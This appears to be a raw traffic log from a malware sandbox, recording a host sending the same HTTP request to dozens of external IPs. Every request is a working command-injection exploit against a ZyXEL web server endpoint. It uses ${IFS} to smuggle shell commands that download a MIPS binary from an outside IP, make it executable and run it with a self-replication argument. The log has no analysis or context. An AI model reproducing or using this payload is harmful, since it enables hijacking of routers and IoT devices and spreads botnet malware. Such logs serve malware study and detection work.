                                          Jan 14, 2024 15:46:25.191612005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6500192.168.2.2348328189.194.189.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191629887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6501192.168.2.2351300102.39.222.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191647053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6502192.168.2.2333828108.40.7.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195683956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6503192.168.2.2338624217.26.156.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195708036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6504192.168.2.23376489.181.197.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195734978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6505192.168.2.2342412177.82.176.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195771933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6506192.168.2.2346602139.117.105.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195804119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6507192.168.2.2348094118.22.68.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195827961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6508192.168.2.2353102139.58.209.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195843935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6509192.168.2.2341166190.97.93.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195852041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6510192.168.2.2355804135.95.37.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195889950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6511192.168.2.234500688.31.226.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195936918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6512192.168.2.2346512179.15.110.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.195967913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6513192.168.2.233384086.76.66.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196022987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6514192.168.2.2335182190.189.140.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196050882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6515192.168.2.2351278216.66.186.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196088076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6516192.168.2.2333180107.246.163.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196110964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6517192.168.2.2354078150.100.225.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196130991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6518192.168.2.233767067.177.131.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196161032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6519192.168.2.2360122155.227.163.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196191072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6520192.168.2.233573669.7.177.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196217060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6521192.168.2.2354450121.194.237.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196242094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6522192.168.2.2340852153.48.133.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196242094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6523192.168.2.2336294182.189.28.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196295977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6524192.168.2.2334758133.208.104.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196317911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6525192.168.2.2351494133.247.52.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196352005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6526192.168.2.233679486.253.255.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196367025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6527192.168.2.23329445.45.69.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196394920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6528192.168.2.234082032.143.66.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196436882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6529192.168.2.2358458152.165.239.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196464062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6530192.168.2.233416852.247.88.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196475983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6531192.168.2.2353668182.136.252.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196492910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6532192.168.2.2353898118.225.246.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196537018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6533192.168.2.2333706210.101.243.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196548939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6534192.168.2.2357944108.65.107.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196592093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6535192.168.2.235630086.197.232.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196625948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6536192.168.2.235501245.189.197.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196665049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6537192.168.2.2350818187.75.68.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196700096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6538192.168.2.2345284198.191.86.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196748972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6539192.168.2.234008490.49.239.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196752071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6540192.168.2.234259251.184.195.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196777105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6541192.168.2.234544071.64.212.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196799994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6542192.168.2.2344156191.8.59.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196824074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6543192.168.2.235977267.250.142.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196858883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6544192.168.2.233719497.63.18.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196914911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6545192.168.2.2355484193.13.16.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196929932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6546192.168.2.2355586140.51.50.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196953058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6547192.168.2.2352508161.181.36.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196981907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6548192.168.2.2351834123.148.109.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.196994066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6549192.168.2.2342284210.69.12.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197033882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6550192.168.2.235303413.31.246.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197036982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6551192.168.2.234077414.80.252.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197079897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6552192.168.2.2334754187.195.55.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197103024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6553192.168.2.2348372216.228.146.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197165012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6554192.168.2.2340832171.168.63.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197173119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6555192.168.2.2336144141.124.78.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197196960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6556192.168.2.233672432.47.9.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197226048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6557192.168.2.235290246.174.243.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197261095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6558192.168.2.2357812220.101.37.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197287083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6559192.168.2.234571670.35.137.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197314024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6560192.168.2.2345880125.171.84.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197329044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6561192.168.2.2354664161.106.192.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.197348118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6562192.168.2.235351696.79.25.63443
                                          TimestampBytes transferredDirectionData
